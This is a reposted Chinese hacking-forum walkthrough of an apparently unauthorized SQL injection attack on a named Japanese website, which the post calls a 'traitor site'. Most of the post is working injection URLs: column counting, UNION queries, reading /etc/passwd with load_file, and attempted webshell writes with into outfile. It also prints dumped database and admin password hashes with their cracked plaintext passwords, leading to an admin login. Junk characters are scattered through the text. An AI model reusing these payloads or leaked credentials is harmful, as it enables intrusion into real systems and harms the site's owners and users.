找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 原创 检测汉奸站全过程
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 3138|回复: 1
打印 上一主题 下一主题

原创 检测汉奸站全过程

[复制链接]
xiancda
跳转到指定楼层
楼主
发表于 2012-9-17 16:22:02 | 显示全部楼层 回帖奖励 |倒序浏览 |阅读模式
补:www.zuaa.jp测试
( L+ M# c' Q- o! \* f

+ D7 j7 M% E! K0 c0x01. 检测 www.zuaa.jp 收集数据
, v2 u$ j2 Q5 S! _
& ~7 |* d: D9 @4 I, k' }: X8 ?5 F- Y) L5 C& o8 e- P/ h  D- f/ Q! I
whatweb7 y2 E0 M* X3 f) I/ T+ W

2 N  T$ b3 J( }, u/ ^! Z+ h1 V' {1 |; Y$ U- o$ {" h# B
利用NMAP扫描$ ^5 G9 v% e' T9 L

" c5 U! I( @  c# B1 q  l$ P中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持6 s1 @2 A( K' ]. Z# W4 r( p
0x02.找注入点! L  b( V' a* J/ z$ C  k3 H, Q6 z
找注入点:http://www.zuaa.jp/php/newsdetail.php?topic_id=390' P6 L; P" Q" M  ^9 W
% T: \; t" q, g$ p) l! A
' m6 R9 o: i9 A/ J. ?6 J6 M! v! J
0x03.order by% F4 z) d; `3 F# @
             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 18 ~& n' v0 i9 f0 `: ^. n: W* L

6 b+ }: C( B) Z/ r% L" }5 }4 Yorder by 28报错,order by 27正常
- J7 O, ?+ |( Q
0 q" x2 H1 M, Q) J2 M& Q0x04.   union手动查询3 F$ i& o8 M9 ~$ Z: Q' X+ J
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
# o3 p6 \  c) K$ J7 G: I添加到 27 时正常显示 4 e* u1 Z# Z. p1 a6 |# p

  m2 L; X! _( ?9 N8 ]中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
! a4 e) P; h  v3 Z
7 i0 h- h$ d( y) ]% q" W0x05. info:
4 s8 ^$ }" h' g8 nhttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
5 Y( M/ l1 |% D! W- T+ j7 [2 o; s8 q1 `0 j
user:            root@localhost
. \) w! X1 q6 B( T, @database:    openpne8 A# ^. R8 I! m# b0 _2 Y/ x" t% J9 b1 ^
version:      4.1.22, X. H) a9 \* K7 s9 {; \
os:             portbld-freebsd5.4. q* [5 G/ b: s* {  U4 A4 Q
; e, _: ]' F3 W3 k0 b+ e7 |
0x06. root用户
+ c) h7 F) o; X' T7 h+ ^利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的(这种方法, 可以过大多数站)
$ W/ s- f" ^( f2 l# f! c5 qhttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 , ]: L+ b$ n5 l3 h8 V/ y+ c

" X: h( N! e! P: j1 c$ a, X' a通过工具转换
3 E0 R+ b) ?! T7 p: p2 h7 G) d- W# c# s
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
1 {. x+ w& |% r( `
7 T  L# B( `* J- S+ J7 r5 v  K0x07. 利用 into outfile
+ l1 s% L. o% p- _, S7 A全部都失败; S( g0 h: ~) a- e
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php
; c% a. \' Z' a! Z# U* L/ j
  P! j# K& [$ n% s" q2 b2 Qhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php % z. q8 _/ p$ Z4 F( Q' `, l4 [8 n
6 `+ {& x, B; J5 n8 S
页面显示“MDB2 Error:syntax error”6 X; i7 V! p, I: U! L7 D8 x
0 f9 X5 s+ }) C  o
0x08. 利用 mysql 4.1
0 {1 R$ H- A3 w) h猜常规表名,字段未果 工具 sqlmap3 {* c  e* Y. I* }: Y
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持$ l$ u  V- J( L. o
# S; p- V  E* Y+ v( x+ y: e/ `7 H

6 z- i' F3 _$ g/ u1 Y' L. r* l- @  O1 e  p7 k2 M
0x09. 查找后台
( n# r. r- B% r6 ?利用 现有的各种 后台工具尝试都不行1 y/ {1 D" f2 e: D4 \

5 l( }! K: Y* h0x10.  MySL外联方法7 q/ {  E6 g1 h9 h* j
从前面 nmap 收集的信息当中,可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码,然后再通过 mysql 工具外连 www.zuaa.jp 不行4 C+ v$ b0 q. q. `4 S* T; L
可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user  ], G8 i. U3 Q% Y
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user! Y3 v  E+ B' t0 _" d
& v2 @8 E; G) _% Y( c
这个可以在 www.cmd5.com 解密
. p# f) H4 g( S, d4 proot:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009+ E4 c, e6 i/ z* U
chen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad971 n4 p. b; S, c+ V  F3 i* }
openpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
+ Z, r- u3 s9 _) |zuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
+ x/ @+ u- c% A0 F- _工具外连失败,据说防火墙策略只允许特定IP外连,具体不得知6 h/ I# x) s2 O) c

& U3 f# `1 M7 s  v5 s
9 x6 \# G$ I- Y) D& @; k, K0x11. 网站突破
5 H4 d4 U, R3 z& L0 @发现网站的源程序 openpne, google 下载 openpne 源码
. |$ I* E# I) C# ^1 }; b" `& u8 z  u' o9 L7 x" l. W
! l& I9 N# l% M
0x12. 默认信息利用6 q7 m0 l4 C! R6 @: d* o
http://sns.zuaa.jp/?m=admin&a=page_login
' [9 ~+ m: j" a0 _3 j  C! ~) e. x' h- H! E' k! p" ?1 P
表名 (c_admin_user) ,字段名(username,password)7 P  |0 a2 k) e8 k
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user) I& y- ]" H* m

7 a& L7 O5 W& Q2 {2 q% ?解密4 d$ v; a- N: k# q$ \3 s
zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa2009
1 b  k, w; l* s. ~# N: |zuaajp:c0923ec5857796a393da99905008c176,          zju1897
! d+ t" e2 [& C$ {' y; C% m& j8 T  v, y2 n
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持* L3 o  Y4 a7 X/ }! l
! c5 E& a7 }" y
0x13. 登录后台$ ~2 S# z7 F. q5 p! u0 e( M* |
4 H  w- ~/ L5 d' l  l$ J6 `/ `
/ r, f. ~0 c1 q' B0 N$ h/ p* B! w

, a" V; `  e# k# {6 o* U0x14. 小结4 U. z* s9 a1 Q  b2 @! a
利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 。
) e" z2 g& M- }" j& C感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点8 [- r( O; w4 ^
------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain
) T2 T% N) t# m, z; D' A中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
8 |* r! \3 J6 b1 n( _' E* a: E% ]$ H* P. ]1 F7 c
最后声明:本人只负责了整理上传到论坛,让大家学习,不是原作者,原作者辛苦了!
3 a3 @6 d" [5 t# T2 t. y" W# I

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表